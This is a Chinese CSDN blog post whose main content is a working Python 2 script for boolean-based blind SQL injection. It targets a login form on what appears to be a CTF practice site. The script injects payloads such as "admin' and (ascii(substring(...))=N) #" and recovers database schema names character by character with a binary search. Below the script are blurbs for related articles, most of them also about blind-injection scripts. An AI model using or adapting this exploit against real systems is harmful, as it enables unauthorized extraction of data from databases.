python mysql盲注小程序

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: 编程 文章标签: 开发 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/48953063
版权 
# -*- coding: gbk -*-
import urllib2
import urllib

sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"

data = {
        "admin":"admin' and (ascii(substring(version(),1,1))=0) #",
        "pass":"f",
        "action":"login"}
def getlength():
    for counti in range(1000):
        data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))
        urldata=urllib.urlencode(data)
        url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
        headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        req = urllib2.Request(url,headers=headers)
        resul=urllib2.urlopen(req).read()
        resulstr=resul.decode('gbk')
        if resulstr.find(u'数据库连接失败')==-1:            #查找中文
            print counti
            return counti
    return False

def sendhttp(countn,sign,num):
    data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))
    urldata=urllib.urlencode(data)
    url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
    req = urllib2.Request(url,headers=headers)
    resul=urllib2.urlopen(req).read()
    resulstr=resul.decode('gbk')
    if resulstr.find(u'数据库连接失败')==-1:
        return True
    return False


coutnum= getlength()
for j in range(1,coutnum+1):
    min,max=0,140
    while min<=max:
        middle=(max+min)//2
        if sendhttp(j,"=",middle):
            print chr(middle),
            break
        if sendhttp(j,">",middle):
            min=middle+1
        else:
            max=middle-1

niexinming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之盲注(小白的学习)
lgsyydsa的博客
06-04 574
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL盲注python脚本自动化注入
菜鸟学安全的博客
12-18 1351
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 374
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
sql盲注python脚本
weixin_48266255的博客
08-29 449
【代码】sql盲注python脚本。
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 677
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1817
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
python-小程序连接mysql数据库
03-24
python-连接mysql数据库,为初学者打造,简单容易。
Python Flask微信小程序订餐系统
08-07
总的来说,Python Flask微信小程序订餐系统是一个结合了Python后端技术、微信小程序前端技术和MySQL数据库的综合项目。它展示了如何利用现代技术搭建一个完整的在线订餐平台,为用户提供无缝的订餐体验。同时,该...
对微信小程序进行解密,python文件
07-27
对微信小程序进行解密,python文件
Python+Flask408答题小程序的后端毕业设计
04-24
Python3.5以上版本均可以使用(自己用3.7在公司测试用3.8都可以),采用API传递JSON的方式进行连接管理,用到了MYSQL,session等常用技术。主要的逻辑部分 分为【Model】【Controller】【API】三层。word中含有丰富...
Python程序接入MySQL数据库
06-20
下面我们仍然以之前创建的名为`hrs`的数据库为例,为大家演示如何通过 Python 程序操作 MySQL 数据库实现数据持久化操作。 首先,我们可以在命令行或者 PyCharm 的终端中通过下面的命令安装`pymysql`,如果需要接入 ...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1602
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
2401_84296945的博客
04-30 650
提示:sleep的时间可以自定义,时间太长效率太低、时间太短则不容易判断。
mysql 盲注手动_学习笔记 MYSQL盲注
weixin_36248747的博客
02-02 198
猜解当前数据库名输入 1 ’ and length(database())=1 # ,显示不存在;输入 1 ’ and length(database())=2 # ,显示不存在;输入 1 ’ and length(database())=3 # ,显示不存在;输入 1 ’ and length(database())=4 # ,显示存在:采用二分法猜解数据库名输入 1’ and asci...
sql注入(ctfhub布尔盲注,脚本)
2401_82760239的博客
04-04 677
如果返回的页面有query_success,即盲猜成功,跳过余下的for循环。#如果返回的页面有query_success,即盲猜成功即跳出无限循环。#i+1是库名的第i+1个字符下标,j是字符取值a-z。#如果没有匹配成功,表名长度+1接着循环。#如果没有匹配成功,列名长度+1接着循环。#匹配到就加到列名长度的列表。#如果没有匹配成功,flag长度+1接着循环。#flag的字符范围列表,包括花括号、a-z,数字0-9。#如果没有匹配成功,库名长度+1接着循环。#如果没有匹配成功,表数量+1接着循环。
SQL盲注python脚本爆破及sqlmap基础操作
wangringyi的博客
04-09 6133
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 871
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
mysql手工注入——盲注
weixin_44110913的博客
10-06 503
一 . 可以查看有几个数据库   命令如下 ' and (select count(*) from information_schema.schemata limit 0,1)=6 --+ 证明有6个数据库。   二 . 查数据库名长度 大于7 回显正常 大于8 回显不正常 我们可以确定数据库名长度为8   三 . 猜库名 (1)使用left()方法去猜解库名 Database=’securi...
微信小程序 python mysql django
11-15
如果你想使用PythonMySQL和Django来开发微信小程序,可以按照以下步骤进行: 1.安装PythonMySQL,并配置好环境变量。 2.安装Django和相关的第三方库,例如django-rest-framework、django-cors-headers等。 3....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值